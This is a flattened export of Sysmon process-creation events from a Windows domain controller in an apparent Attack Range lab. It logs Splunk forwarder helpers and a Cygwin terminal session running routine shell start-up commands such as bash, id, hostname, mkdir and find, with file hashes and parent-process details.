14:59:19.958{A8622C2F-54C7-6078-EA0C-00000000AE01}1332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059898Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:19.523{A8622C2F-54C7-6078-E90C-00000000AE01}5792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059882Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:17.631{A8622C2F-54C5-6078-E80C-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:59:17.014{A8622C2F-54C5-6078-E70C-00000000AE01}5700C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:59:16.383{A8622C2F-54C4-6078-E60C-00000000AE01}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059757Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:48.053{A8622C2F-54A8-6078-E50C-00000000AE01}5276C:\Program Files\Python38\python.exe3.8.9PythonPythonPython Software Foundationpython.exe"C:\Program 
Files\Python38\python.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=249A55048751D0C77446657437C342B7,SHA256=5473F5813336283A44FEA373B2C84DCBAF5E7A337EE7A40883DEA3EF4C73A99A,IMPHASH=A1304C4778128720E89539BB55752E4C{A8622C2F-54A8-6078-E40C-00000000AE01}3508C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059738Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:48.023{A8622C2F-54A8-6078-E40C-00000000AE01}3508C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059702Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.859{A8622C2F-54A2-6078-E30C-00000000AE01}5700C:\cygwin64\bin\tzset.exe-----"C:\cygwin64\bin\tzset.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9A334E31142D616401445D77D38B145A,SHA256=3D76C166E2D05B23A6E164B1F9C251C771AEF4E423B00C2EBE4080682C93C243,IMPHASH=36078269731E740E482547ADAAC73406{A8622C2F-54A2-6078-E20C-00000000AE01}920C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059691Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.849{A8622C2F-54A2-6078-E20C-00000000AE01}920C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-E10C-00000000AE01}7016C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059681Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.841{A8622C2F-54A2-6078-E10C-00000000AE01}7016C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059669Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.821{A8622C2F-54A2-6078-E00C-00000000AE01}7040C:\cygwin64\bin\hostname.exe-----"C:\cygwin64\bin\hostname.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F878873A65DDEC4BAA463FF3416948A0,SHA256=C992E93BE921A11E753E73B58CF1D416CFE76FA2343EA5372B8D1041B91C0537,IMPHASH=7A0D5877DB45EFCFBB4AE97A9AC54C41{A8622C2F-54A2-6078-DF0C-00000000AE01}4288C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059659Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.813{A8622C2F-54A2-6078-DF0C-00000000AE01}4288C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-DE0C-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059649Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.805{A8622C2F-54A2-6078-DE0C-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\home\administrator\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059637Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.794{A8622C2F-54A2-6078-DD0C-00000000AE01}2824C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-DC0C-00000000AE01}1028C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059627Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.785{A8622C2F-54A2-6078-DC0C-00000000AE01}1028C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.774{A8622C2F-54A2-6078-DB0C-00000000AE01}184C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-DA0C-00000000AE01}1496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059606Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.766{A8622C2F-54A2-6078-DA0C-00000000AE01}1496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059596Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.756{A8622C2F-54A2-6078-D90C-00000000AE01}6852C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-D80C-00000000AE01}5496C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059586Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.748{A8622C2F-54A2-6078-D80C-00000000AE01}5496C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.733{A8622C2F-54A2-6078-D70C-00000000AE01}5148C:\cygwin64\bin\install.exe-----"C:\cygwin64\bin\install.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=184F23D6CE222C67B7CBD57C6B6B9C62,SHA256=A27AF4601F4A7F4BC2CB7B9FC1ECB0ACEFBE58B1322C5BD4B5AF5EB62409BE29,IMPHASH=796EF09DDA984EA31CD00B864D8AA564{A8622C2F-54A2-6078-D60C-00000000AE01}4420C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059565Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.725{A8622C2F-54A2-6078-D60C-00000000AE01}4420C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059550Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.709{A8622C2F-54A2-6078-D50C-00000000AE01}5828C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-54A2-6078-D30C-00000000AE01}6248C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059545Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.708{A8622C2F-54A2-6078-D40C-00000000AE01}3868C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059535Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.701{A8622C2F-54A2-6078-D30C-00000000AE01}6248C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\etc\skel\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059523Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.692{A8622C2F-54A2-6078-D20C-00000000AE01}5276C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-54A2-6078-D10C-00000000AE01}4860C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.684{A8622C2F-54A2-6078-D10C-00000000AE01}4860C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.668{A8622C2F-54A2-6078-D00C-00000000AE01}5628C:\cygwin64\bin\id.exe-----"C:\cygwin64\bin\id.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=5800D64A2799F3182F90A7DBC34B5B1D,SHA256=0B939F24A18CBAF7C8FBBF8A8AE4F474CBDF61BD54870D687A584DA4B29E1FD3,IMPHASH=7D3F9B4155D2A624AD839B9C7F2F075A{A8622C2F-54A2-6078-CF0C-00000000AE01}4268C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059492Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.659{A8622C2F-54A2-6078-CF0C-00000000AE01}4268C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CE0C-00000000AE01}6492C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059482Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.651{A8622C2F-54A2-6078-CE0C-00000000AE01}6492C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000059460Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:42.634{A8622C2F-54A2-6078-CD0C-00000000AE01}6076C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-54A2-6078-CC0C-00000000AE01}5412C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.618{A8622C2F-54A2-6078-CC0C-00000000AE01}5412C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.361{A8622C2F-54A2-6078-CA0C-00000000AE01}1736C:\cygwin64\bin\cygwin-console-helper.exe-----"\\?\C:\cygwin64\bin\cygwin-console-helper.exe" 0x418 0x41CC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8BFA89E9045A949619C8511955C39779,SHA256=7B4BB51FC16D1B4F44D2A73D9939C177008D5DB4E9EECCA42A9D01D90D7C8CEF,IMPHASH=DC4FCFEBC59A5F04DB2C6D852B01071C{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico - 154100x800000000000000059391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:42.141{A8622C2F-54A2-6078-C90C-00000000AE01}4568C:\cygwin64\bin\mintty.exe3.4.7.0TerminalminttyAndy Koppe / Thomas 
Wolff-"C:\cygwin64\bin\mintty.exe" -i /Cygwin-Terminal.ico -C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=50431EE2883CD9A0A8C5EA1E1F4230FB,SHA256=4CE199A128F2A4C81D4CC148F584E477B2503A60BDB7CD7378FDFF75911FBD59,IMPHASH=0842AFFFBDCBF477F24E7B64DE1026AD{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000059143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:22.840{A8622C2F-548E-6078-C50C-00000000AE01}6112C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059125Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:20.903{A8622C2F-548C-6078-C40C-00000000AE01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:58:20.221{A8622C2F-548C-6078-C30C-00000000AE01}5832C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:19.665{A8622C2F-548B-6078-C20C-00000000AE01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059077Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:17.681{A8622C2F-5489-6078-C10C-00000000AE01}4604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:58:16.999{A8622C2F-5488-6078-C00C-00000000AE01}6556C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000059057Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 